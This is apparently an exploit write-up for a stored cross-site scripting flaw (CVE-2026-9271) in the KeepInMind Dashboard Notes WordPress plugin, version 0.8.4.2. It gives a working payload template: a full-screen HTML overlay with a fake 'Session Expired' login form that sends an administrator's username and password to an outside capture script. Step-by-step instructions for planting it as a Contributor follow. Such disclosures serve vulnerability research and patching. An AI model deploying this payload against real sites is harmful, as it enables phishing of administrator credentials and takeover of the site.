# Exploit Title: KeepInMind 0.8.4.2 - Stored XSS
# Date: 2026-06-12
# Exploit Author: Pavan N
# Vendor Homepage: https://wordpress.org/plugins/keepinmind-dashboard-notes/
# Software Link: https://downloads.wordpress.org/plugin/keepinmind-dashboard-notes.0.8.4.3.zip
# Version: <= 0.8.4.2
# Tested on: WordPress 6.x / Linux
# CVE: CVE-2026-9271
# CVSS Score: 9.0 (Critical)
1. Technical Description:
The KeepInMind - Dashboard Notes plugin (version 0.8.4.2 and below) fails to properly restrict dangerous CSS properties within the 'wp_kses' sanitization filter when processing the 'content' parameter via its REST API endpoint. Authenticated attackers with Contributor+ privileges can inject custom HTML/CSS utilizing 'position: fixed', 'z-index', and viewport units (vw/vh). When an Administrator views the dashboard, the payload renders globally over the viewport, redressing the UI to spoof a high-fidelity "Session Expired" re-authentication prompt, enabling administrative account takeover.
2. Proof of Concept / Payload Template:
An attacker sends a POST request to the plugin's note-saving REST endpoint with the following HTML payload structure:
<div style="position: fixed; top: 0; left: 0; width: 100vw; height: 100vh; z-index: 999999; background: #f0f0f1;">
<form action="http://example.com/capture.php" method="POST">
<h3>Session Expired. Please log in again.</h3>
<input type="text" name="log" placeholder="Username">
<input type="password" name="pwd" placeholder="Password">
<input type="submit" value="Log In">
</form>
</div>
3. Steps to Reproduce:
a. Log in as a Contributor user.
b. Issue a request to update/create a dashboard note containing the layout-redressing payload.
c. Log in as an Administrator and navigate to the main dashboard page.
d. Observe the entire administrative interface obscured by the injected container.